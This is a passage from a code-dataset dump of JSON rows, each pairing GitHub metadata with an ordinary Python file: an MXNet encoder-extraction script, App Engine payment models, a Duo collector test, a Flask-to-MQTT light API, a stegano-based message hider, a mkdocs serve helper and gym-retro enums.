{}\".format(task_obj.result()))"},"avg_line_length":{"kind":"number","value":26.3636363636,"string":"26.363636"},"max_line_length":{"kind":"number","value":71,"string":"71"},"alphanum_fraction":{"kind":"number","value":0.6689655172,"string":"0.668966"}}},{"rowIdx":46382,"cells":{"hexsha":{"kind":"string","value":"96050349c05924aa062803ddf5dd8d851a867f8b"},"size":{"kind":"number","value":5081,"string":"5,081"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py"},"max_stars_repo_name":{"kind":"string","value":"gopala-kr/ds-notebooks"},"max_stars_repo_head_hexsha":{"kind":"string","value":"bc35430ecdd851f2ceab8f2437eec4d77cb59423"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2019-05-10T09:16:23.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2019-05-10T09:16:23.000Z"},"max_issues_repo_path":{"kind":"string","value":"mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py"},"max_issues_repo_name":{"kind":"string","value":"gopala-kr/ds-notebooks"},"max_issues_repo_head_hexsha":{"kind":"string","value":"bc35430ecdd851f2ceab8f2437eec4d77cb59423"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py"},"max_forks_repo_name":{"kind":"string","value":"gopala-kr/ds-notebooks"},"max_forks_repo_head_hexsha":{"kind":"string","value":"bc35430ecdd851f2ceab8f2437eec4d77cb59423"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2019-10-14T07:30:18.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2019-10-14T07:30:18.000Z"},"content":{"kind":"string","value":"\"\"\"\nSimple Translate CLI\n\"\"\"\nfrom contextlib import ExitStack\n\nimport mxnet as mx\nimport sys\nimport argparse\nimport logging\nimport time\nimport sockeye.utils\nfrom sockeye.utils import acquire_gpu, get_num_gpus\nimport sockeye.data_io\nimport sockeye.arguments as arguments\nimport sockeye.inference\nimport re\nimport numpy as np\n\n\ndef main():\n \n params = argparse.ArgumentParser(description='Translate from STDIN to STDOUT')\n params.add_argument('--model-prefixes', '-m', required=False, nargs='+',\n help='model prefix(es). Use multiple for ensemble decoding. ' +\n 'Model prefix determines config, best epoch params and vocab files.')\n params.add_argument('--epochs', '-e', required=False, default=None, type=int, nargs='+',\n help='If not given, chooses best epochs/checkpoints for each model. If specified, must have the same ' +\n 'length as --model-prefix and be integer')\n\n params.add_argument('--max-input-len', '-n', type=int, default=None,\n help='Maximum sentence length. Default: value from trained model(s).')\n params.add_argument('--output-type', default='translation', choices=[\"translation\", \"align_plot\", \"align_text\"],\n help='Either print the translation or visualize the alignment. Default: translation')\n params.add_argument('--align-plot-prefix', default=\"align\",\n help='Prefix used when plotting the alignment.')\n params.add_argument('--log-level', default=logging.INFO, type=int,\n choices=[logging.INFO, logging.WARN, logging.DEBUG])\n params.add_argument('--beam-size', '-b', type=int, default=1, help='beam size. If == 1, greedy decode')\n params.add_argument('--ensemble-mode', type=str, default='linear', choices=['linear', 'log_linear'],\n help='Ensemble mode: linear or log-linear interpolation of model predictions. Default: linear')\n params.add_argument('--softmax-temperature', type=float, default=None, required=False,\n help='Controls peakiness of model predictions. Values < 1.0 produce peaked predictions, ' +\n 'values > 1.0 produce smoothed distributions.')\n params = arguments.add_device_args(params)\n args = params.parse_args()\n\n args.model_prefixes = ['model/']\n assert args.beam_size > 0, \"Beam size must be 1 or greater.\"\n if args.epochs is not None:\n assert len(args.epochs) == len(args.model_prefixes), \"must provide epochs for each model\"\n\n #sockeye.utils.setup_logging(args.log_level)\n logging.basicConfig(filename='test.log', level=logging.INFO)\n \n logging.info(\"Command: %s\", \" \".join(sys.argv))\n logging.info(\"Arguments: %s\", args)\n\n with ExitStack() as exit_stack:\n if args.use_cpu:\n context = mx.cpu()\n else:\n num_gpus = get_num_gpus()\n assert num_gpus > 0, \"No GPUs found, consider running on the CPU with --use-cpu \" \\\n \"(note: check depends on nvidia-smi and this could also mean that the nvidia-smi \" \\\n \"binary isn't on the path).\"\n assert len(args.device_ids) == 1, \"cannot run on multiple devices for now\"\n gpu_id = args.device_ids[0]\n if gpu_id < 0:\n # get an automatic gpu id:\n gpu_id = exit_stack.enter_context(acquire_gpu())\n context = mx.gpu(gpu_id)\n\n translator = sockeye.inference.Translator(context,\n args.ensemble_mode,\n *sockeye.inference.load_models(context,\n args.max_input_len,\n args.beam_size,\n args.model_prefixes,\n args.epochs,\n args.softmax_temperature))\n ############ CHANGE HERE ########################\n sample_file = open('train_question_token.txt','r')\n encoder_file = open('train_question_encoder.txt', \"w\")\n #################################################\n \n for i, line in enumerate(sample_file,1):\n trans_input = translator.make_input(i,line)\n source, source_length, bucket_key = translator._get_inference_input(trans_input.tokens)\n encoded_source, _ , _ , _, _ = translator.models[0].run_encoder(source, source_length, bucket_key)\n last_slice_source = mx.ndarray.mean(encoded_source, axis=1, keepdims=True)\n last_slice_source = last_slice_source.reshape((-1,))\n encoder_file.write(\" \".join(map(str, last_slice_source.asnumpy()))+\"\\n\")\n\n encoder_file.close()\n\nif __name__ == '__main__':\n main()\n"},"avg_line_length":{"kind":"number","value":51.8469387755,"string":"51.846939"},"max_line_length":{"kind":"number","value":128,"string":"128"},"alphanum_fraction":{"kind":"number","value":0.5711474119,"string":"0.571147"}}},{"rowIdx":46383,"cells":{"hexsha":{"kind":"string","value":"7dc2a90ba4547195588f251869e654e8a1c3535b"},"size":{"kind":"number","value":2552,"string":"2,552"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"plugins/tff_backend/models/payment.py"},"max_stars_repo_name":{"kind":"string","value":"threefoldfoundation/app_backend"},"max_stars_repo_head_hexsha":{"kind":"string","value":"b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"plugins/tff_backend/models/payment.py"},"max_issues_repo_name":{"kind":"string","value":"threefoldfoundation/app_backend"},"max_issues_repo_head_hexsha":{"kind":"string","value":"b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":178,"string":"178"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2017-08-02T12:58:06.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2017-12-20T15:01:12.000Z"},"max_forks_repo_path":{"kind":"string","value":"plugins/tff_backend/models/payment.py"},"max_forks_repo_name":{"kind":"string","value":"threefoldfoundation/app_backend"},"max_forks_repo_head_hexsha":{"kind":"string","value":"b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":2,"string":"2"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2018-01-10T10:43:12.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2018-03-18T10:42:23.000Z"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# Copyright 2017 GIG Technology NV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# @@license_version:1.3@@\n\nfrom google.appengine.ext import ndb\n\nfrom framework.models.common import NdbModel\nfrom plugins.tff_backend.plugin_consts import NAMESPACE\n\n\nclass ThreeFoldBaseTransaction(NdbModel):\n NAMESPACE = NAMESPACE\n timestamp = ndb.IntegerProperty()\n unlock_timestamps = ndb.IntegerProperty(repeated=True, indexed=False) # type: list[int]\n unlock_amounts = ndb.IntegerProperty(repeated=True, indexed=False) # type: list[int]\n token = ndb.StringProperty()\n token_type = ndb.StringProperty()\n amount = ndb.IntegerProperty()\n precision = ndb.IntegerProperty(default=2)\n memo = ndb.StringProperty()\n usernames = ndb.StringProperty(repeated=True)\n from_username = ndb.StringProperty()\n to_username = ndb.StringProperty()\n\n\nclass ThreeFoldTransaction(ThreeFoldBaseTransaction):\n amount_left = ndb.IntegerProperty()\n fully_spent = ndb.BooleanProperty()\n height = ndb.IntegerProperty()\n\n @property\n def id(self):\n return self.key.id()\n\n @classmethod\n def create_new(cls):\n return cls(namespace=NAMESPACE)\n\n @classmethod\n def list_with_amount_left(cls, username):\n return cls.query() \\\n .filter(cls.to_username == username) \\\n .filter(cls.fully_spent == False) \\\n .order(-cls.timestamp) # noQA\n\n\nclass ThreeFoldPendingTransaction(ThreeFoldBaseTransaction):\n STATUS_PENDING = u'pending'\n STATUS_CONFIRMED = u'confirmed'\n STATUS_FAILED = u'failed'\n\n synced = ndb.BooleanProperty()\n synced_status = ndb.StringProperty()\n\n @property\n def id(self):\n return self.key.string_id().decode('utf8')\n\n @classmethod\n def create_key(cls, transaction_id):\n return ndb.Key(cls, u\"%s\" % transaction_id, namespace=NAMESPACE)\n\n @classmethod\n def list_by_user(cls, username):\n return cls.query() \\\n .filter(cls.usernames == username) \\\n .order(-cls.timestamp)\n"},"avg_line_length":{"kind":"number","value":31.5061728395,"string":"31.506173"},"max_line_length":{"kind":"number","value":92,"string":"92"},"alphanum_fraction":{"kind":"number","value":0.704153605,"string":"0.704154"}}},{"rowIdx":46384,"cells":{"hexsha":{"kind":"string","value":"4858b0ab221bd6fcbedef2394043bc190ecf5a5e"},"size":{"kind":"number","value":983,"string":"983"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py"},"max_stars_repo_name":{"kind":"string","value":"jrauen/content"},"max_stars_repo_head_hexsha":{"kind":"string","value":"81a92be1cbb053a5f26a6f325eff3afc0ca840e0"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py"},"max_issues_repo_name":{"kind":"string","value":"jrauen/content"},"max_issues_repo_head_hexsha":{"kind":"string","value":"81a92be1cbb053a5f26a6f325eff3afc0ca840e0"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":40,"string":"40"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2022-03-03T07:34:00.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-31T07:38:35.000Z"},"max_forks_repo_path":{"kind":"string","value":"Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py"},"max_forks_repo_name":{"kind":"string","value":"jrauen/content"},"max_forks_repo_head_hexsha":{"kind":"string","value":"81a92be1cbb053a5f26a6f325eff3afc0ca840e0"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from DuoEventCollector import Client, GetEvents, LogType, Params\n\ndemisto_params = {'after': '1 month', 'host': 'api-a1fdb00d.duosecurity.com', 'integration_key': 'DI47EXXXXXXXWRYV2',\n 'limit': '5', 'proxy': False, 'retries': '5', 'secret_key': {'password': 'YK6mtSzXXXXXXXXXXX',\n 'passwordChanged': False}}\ndemisto_params['params'] = Params(**demisto_params, mintime={})\nclient = Client(demisto_params)\nget_events = GetEvents(client=client, request_order=[LogType.AUTHENTICATION, LogType.ADMINISTRATION, LogType.TELEPHONY])\n\n\ndef test_rotate_request_order():\n get_events.rotate_request_order()\n assert get_events.request_order == [LogType.ADMINISTRATION, LogType.TELEPHONY, LogType.AUTHENTICATION]\n get_events.rotate_request_order()\n get_events.rotate_request_order()\n assert get_events.request_order == [LogType.AUTHENTICATION, LogType.ADMINISTRATION, LogType.TELEPHONY]\n"},"avg_line_length":{"kind":"number","value":57.8235294118,"string":"57.823529"},"max_line_length":{"kind":"number","value":120,"string":"120"},"alphanum_fraction":{"kind":"number","value":0.6998982706,"string":"0.699898"}}},{"rowIdx":46385,"cells":{"hexsha":{"kind":"string","value":"d21059497ff56cda89a8d1b389c15c04c01fa702"},"size":{"kind":"number","value":2773,"string":"2,773"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"src/api/light.py"},"max_stars_repo_name":{"kind":"string","value":"th-koeln-intia/ip-sprachassistent-team1"},"max_stars_repo_head_hexsha":{"kind":"string","value":"69fbc06a326da91fd3d84f222eba6cd2b1a79975"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-04-28T09:45:34.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-04-28T09:45:34.000Z"},"max_issues_repo_path":{"kind":"string","value":"src/api/light.py"},"max_issues_repo_name":{"kind":"string","value":"th-koeln-intia/ip-sprachassistent-team1"},"max_issues_repo_head_hexsha":{"kind":"string","value":"69fbc06a326da91fd3d84f222eba6cd2b1a79975"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":1,"string":"1"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2020-09-24T07:20:16.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2020-09-24T07:20:16.000Z"},"max_forks_repo_path":{"kind":"string","value":"src/api/light.py"},"max_forks_repo_name":{"kind":"string","value":"th-koeln-intia/ip-sprachassistent-team1"},"max_forks_repo_head_hexsha":{"kind":"string","value":"69fbc06a326da91fd3d84f222eba6cd2b1a79975"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2020-12-04T13:38:33.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2020-12-04T13:38:33.000Z"},"content":{"kind":"string","value":"from api.app import app\nfrom api import MQTT_HOST, MQTT_PORT\nfrom flask import request, Response, jsonify\nimport json \nimport paho.mqtt.publish as publish\nfrom json import JSONDecoder, JSONEncoder\n\n \n@app.route('/light/set', methods=['POST'])\ndef set_light():\n body = request.get_json()\n if body is None or 'friendly_name' not in body or 'payload' not in body:\n return jsonify({\"error\": \"BAD_REQUEST\"}), 400\n else:\n publish_set(body['friendly_name'], json.dumps(body['payload'])) \n publish_feedback(json.dumps(body['feedback']))\n return json.dumps(body), 200\n\n\n@app.route('/light/set/raw', methods=['POST'])\ndef set_light_raw():\n body = request.get_json()\n if body is None:\n return jsonify({\"error\": \"BAD_REQUEST\"}), 400\n friendly_name = get_friendly_name_from_rhasspy_intent(body)\n payload = create_payload_from_rhasspy_intent(body)\n publish_set(friendly_name, json.dumps(payload))\n raw_text = get_raw_text_as_payload(body)\n publish_feedback(json.dumps(raw_text))\n return json.dumps(body), 200\n\n\ndef create_payload_from_rhasspy_intent(dict):\n entities = dict.get('entities', None)\n if entities is None:\n return None\n state = next((x for x in entities if x['entity'] == 'state'), None)\n brightness = next((x for x in entities if x['entity'] == 'brightness'), None)\n color = next((x for x in entities if x['entity'] == 'color'), None)\n payload = {}\n if state is not None and 'value' in state:\n payload['state'] = state['value']\n if brightness is not None and 'value' in brightness:\n payload['brightness'] = brightness['value']\n if color is not None and 'value' in color:\n payload['color'] = color['value']\n return payload\n\n\ndef get_friendly_name_from_rhasspy_intent(dict):\n entities = dict.get('entities', None)\n if entities is None:\n return None\n room = next((e for e in entities if e['entity'] == 'room'), None)\n return room.get('value', None)\n\n\ndef publish_set(friendly_name, payload):\n topic = 'zigbee2mqtt/' + friendly_name + '/set'\n publish.single(topic, payload, hostname=MQTT_HOST, port=MQTT_PORT)\n\n\ndef publish_feedback(payload):\n topic = 'hermes/tts/say'\n publish.single(topic, payload, hostname=MQTT_HOST, port=MQTT_PORT)\n\n\ndef get_raw_value_from_room_entity(dict):\n entities = dict.get('entities', None)\n if entities is None:\n return None\n room = next((e for e in entities if e['entity'] == 'room'), None)\n\n return room.get('raw_value', None)\n\ndef get_raw_text_as_payload(dict):\n payload = {}\n payload['text'] = dict.get('raw_text', None)\n if(payload['text'] is not None):\n payload['text'] = 'Okay, ' + payload['text']\n print(json.dumps(payload))\n return payload"},"avg_line_length":{"kind":"number","value":33.8170731707,"string":"33.817073"},"max_line_length":{"kind":"number","value":81,"string":"81"},"alphanum_fraction":{"kind":"number","value":0.6736386585,"string":"0.673639"}}},{"rowIdx":46386,"cells":{"hexsha":{"kind":"string","value":"d27ffe7a1e06854e2ba699eea5d81dfb4945c148"},"size":{"kind":"number","value":1901,"string":"1,901"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Steg2.py"},"max_stars_repo_name":{"kind":"string","value":"Han-Lon/Steganosimple-Cryptor"},"max_stars_repo_head_hexsha":{"kind":"string","value":"8fb10993d51250fdfe25f02311f7143af21e8085"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"Steg2.py"},"max_issues_repo_name":{"kind":"string","value":"Han-Lon/Steganosimple-Cryptor"},"max_issues_repo_head_hexsha":{"kind":"string","value":"8fb10993d51250fdfe25f02311f7143af21e8085"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Steg2.py"},"max_forks_repo_name":{"kind":"string","value":"Han-Lon/Steganosimple-Cryptor"},"max_forks_repo_head_hexsha":{"kind":"string","value":"8fb10993d51250fdfe25f02311f7143af21e8085"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from stegano import lsb\nfrom tkinter import filedialog\n\n\n# A personal project to test out some Steganography functions. Steganography involves hiding data inside\n# image files (e.g. in the buffer, in unused bits, etc) without altering the physical appearance of the image at all.\n\n\n# Hide a message into an image using LSB method, and designate an output\ndef hide(message, image, output):\n secret = lsb.hide(image, message)\n secret.save(output)\n\n\n# Reveal a message hidden in an image that was hidden using LSB method. Handles errors for if image\n# doesn't have a message hidden within it.\ndef reveal(image):\n try:\n revealed = str.encode(lsb.reveal(image))\n revealedfinal = str(revealed, encoding='utf-8')\n return revealedfinal\n except TypeError:\n print('ERROR! Image doesn\\'t seem to have any hidden message.')\n\n\nif __name__ == '__main__':\n looper = True\n while looper:\n # Logic for interacting with the program in a CLI manner\n operation = input('Enter an operation - 1. Hide 2. Reveal \\n')\n if operation == '1':\n print('Hide data option selected...')\n # Time to hide data in an image file\n message = input('\\n Enter a message! \\n')\n img_input = filedialog.askopenfilename()\n temp_path = img_input.split('.')\n output_path = temp_path[0] + '1' + '.png'\n hide(message, img_input, output_path)\n print('Message has been hidden in {}'.format(output_path))\n elif operation == '2':\n # Time to pull data hidden in an image file\n print('Reveal data option selected...')\n img_input = filedialog.askopenfilename()\n output = reveal(img_input)\n print('Data hidden in the image file: {}'.format(output))\n else:\n # Exit the function\n looper = False\n break\n\n"},"avg_line_length":{"kind":"number","value":37.2745098039,"string":"37.27451"},"max_line_length":{"kind":"number","value":117,"string":"117"},"alphanum_fraction":{"kind":"number","value":0.6349289847,"string":"0.634929"}}},{"rowIdx":46387,"cells":{"hexsha":{"kind":"string","value":"96714247c993e41c5762d3e61ed42c474feb4d08"},"size":{"kind":"number","value":2136,"string":"2,136"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":".arch/plugins/doc_lcdoc/serve.py"},"max_stars_repo_name":{"kind":"string","value":"axiros/docutools"},"max_stars_repo_head_hexsha":{"kind":"string","value":"f99874a64afba8f5bc740049d843151ccd9ceaf7"},"max_stars_repo_licenses":{"kind":"list like","value":["BSD-2-Clause"],"string":"[\n \"BSD-2-Clause\"\n]"},"max_stars_count":{"kind":"number","value":24,"string":"24"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-04T22:11:59.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-02-02T21:51:43.000Z"},"max_issues_repo_path":{"kind":"string","value":".arch/plugins/doc_lcdoc/serve.py"},"max_issues_repo_name":{"kind":"string","value":"axiros/docutools"},"max_issues_repo_head_hexsha":{"kind":"string","value":"f99874a64afba8f5bc740049d843151ccd9ceaf7"},"max_issues_repo_licenses":{"kind":"list like","value":["BSD-2-Clause"],"string":"[\n \"BSD-2-Clause\"\n]"},"max_issues_count":{"kind":"number","value":2,"string":"2"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-04T21:51:30.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2021-10-05T14:15:31.000Z"},"max_forks_repo_path":{"kind":"string","value":".arch/plugins/doc_lcdoc/serve.py"},"max_forks_repo_name":{"kind":"string","value":"axiros/docutools"},"max_forks_repo_head_hexsha":{"kind":"string","value":"f99874a64afba8f5bc740049d843151ccd9ceaf7"},"max_forks_repo_licenses":{"kind":"list like","value":["BSD-2-Clause"],"string":"[\n \"BSD-2-Clause\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#!/usr/bin/env python\n\"\"\"\n`doc serve` is a convenience tool which starts the live server together with doc pre_process\n\n(with working but changeable defaults)\n\nNote: You have to run this from the repo root of a checked out devapp project, which has a docs folder.\n\n\n\"\"\"\nfrom devapp.tools import FLG, exists\nfrom devapp.app import app, do, system, run_app\nimport os, sys, json\nimport time\n\n# ------------------------------------------------------------------------------ config\n\nfrom . import pre_process # import lit_prog_evaluation\n\n\nclass Flags:\n autoshort = ''\n\n class lit_prog_evaluation(pre_process.Flags.lit_prog_evaluation):\n 'Example: re-evaluate only page config.md.lp: doc serve -lpe conf'\n d = 'md'\n\n class pre_proc:\n n = 'How to run doc pre_process'\n\n class port:\n n = 'mkdocs live server port. if the port is occupied (checked via netstat) we kill(!) the occupying other process'\n d = 8000\n\n class only_kill:\n n = 'Action: Only kill server at port'\n d = False\n\n\n# ----------------------------------------------------------------------------- actions\n\n\ndef kill_server():\n p = FLG.port\n cmd = 'netstat -tanp | grep \" LISTEN \" | grep \":%s\"' % p\n res = os.popen(cmd).read().strip().split()\n if not res:\n return app.warn('No server process was running at port', port=p)\n app.warn('Killing', proc=res)\n proc = res[-1].split('/', 1)[0]\n do(os.kill, int(proc), 9)\n app.warn('Server process at port killed', port=p)\n\n\ndef start_server():\n do(kill_server)\n cmd = 'mkdocs serve --livereload -a 127.0.0.1:%s &' % FLG.port\n do(system, cmd)\n\n\ndef start_doc_preproc():\n cmd = 'doc pre_process --lit_prog_evaluation=%s --lit_prog_evaluation_monitor=true'\n cmd = cmd % FLG.lit_prog_evaluation\n do(system, cmd)\n\n\ndef run():\n if FLG.only_kill:\n return do(kill_server)\n\n D = os.getcwd()\n if not exists(D + '/docs/'):\n app.die('You have to run doc serve within the repo root of a devapps checkout')\n do(start_server)\n p = FLG.port\n do(start_doc_preproc)\n\n\nmain = lambda: run_app(run, flags=Flags)\n"},"avg_line_length":{"kind":"number","value":26.7,"string":"26.7"},"max_line_length":{"kind":"number","value":123,"string":"123"},"alphanum_fraction":{"kind":"number","value":0.6062734082,"string":"0.606273"}}},{"rowIdx":46388,"cells":{"hexsha":{"kind":"string","value":"fb595e128f019ae4e13c45fab11da4f05a338717"},"size":{"kind":"number","value":1016,"string":"1,016"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"retro/enums.py"},"max_stars_repo_name":{"kind":"string","value":"MatPoliquin/retro"},"max_stars_repo_head_hexsha":{"kind":"string","value":"c70c174a9818d1e97bc36e61abb4694d28fc68e1"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT-0","MIT"],"string":"[\n \"MIT-0\",\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":2706,"string":"2,706"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-04-05T18:28:50.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-29T16:56:59.000Z"},"max_issues_repo_path":{"kind":"string","value":"retro/enums.py"},"max_issues_repo_name":{"kind":"string","value":"MatPoliquin/retro"},"max_issues_repo_head_hexsha":{"kind":"string","value":"c70c174a9818d1e97bc36e61abb4694d28fc68e1"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT-0","MIT"],"string":"[\n \"MIT-0\",\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":242,"string":"242"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2018-04-05T22:30:42.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-19T01:55:11.000Z"},"max_forks_repo_path":{"kind":"string","value":"retro/enums.py"},"max_forks_repo_name":{"kind":"string","value":"MatPoliquin/retro"},"max_forks_repo_head_hexsha":{"kind":"string","value":"c70c174a9818d1e97bc36e61abb4694d28fc68e1"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT-0","MIT"],"string":"[\n \"MIT-0\",\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":464,"string":"464"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2018-04-05T19:10:34.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-28T13:33:32.000Z"},"content":{"kind":"string","value":"from enum import Enum\n\n\nclass State(Enum):\n \"\"\"\n Special values for setting the restart state of the environment. You can\n also specify a string that is the name of the ``.state`` file\n \"\"\"\n DEFAULT = -1 #: Start the game at the default savestate from ``metadata.json``\n NONE = 0 #: Start the game at the power on screen for the emulator\n\n\nclass Observations(Enum):\n \"\"\"\n Different settings for the observation space of the environment\n \"\"\"\n IMAGE = 0 #: Use RGB image observations\n RAM = 1 #: Use RAM observations where you can see the memory of the game instead of the screen\n\n\nclass Actions(Enum):\n \"\"\"\n Different settings for the action space of the environment\n \"\"\"\n ALL = 0 #: MultiBinary action space with no filtered actions\n FILTERED = 1 #: MultiBinary action space with invalid or not allowed actions filtered out\n DISCRETE = 2 #: Discrete action space for filtered actions\n MULTI_DISCRETE = 3 #: MultiDiscete action space for filtered actions"},"avg_line_length":{"kind":"number","value":36.2857142857,"string":"36.285714"},"max_line_length":{"kind":"number","value":99,"string":"99"},"alphanum_fraction":{"kind":"number","value":0.6958661417,"string":"0.695866"}}},{"rowIdx":46389,"cells":{"hexsha":{"kind":"string","value":"f766b23e2080d4363dc21b4a4bf6048e315bfffb"},"size":{"kind":"number","value":7556,"string":"7,556"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"test/distributed/fsdp/test_fsdp_checkpoint.py"},"max_stars_repo_name":{"kind":"string","value":"vuanvin/pytorch"},"max_stars_repo_head_hexsha":{"kind":"string","value":"9267fd8d7395074001ad7cf2a8f28082dbff6b0b"},"max_stars_repo_licenses":{"kind":"list like","value":["Intel"],"string":"[\n 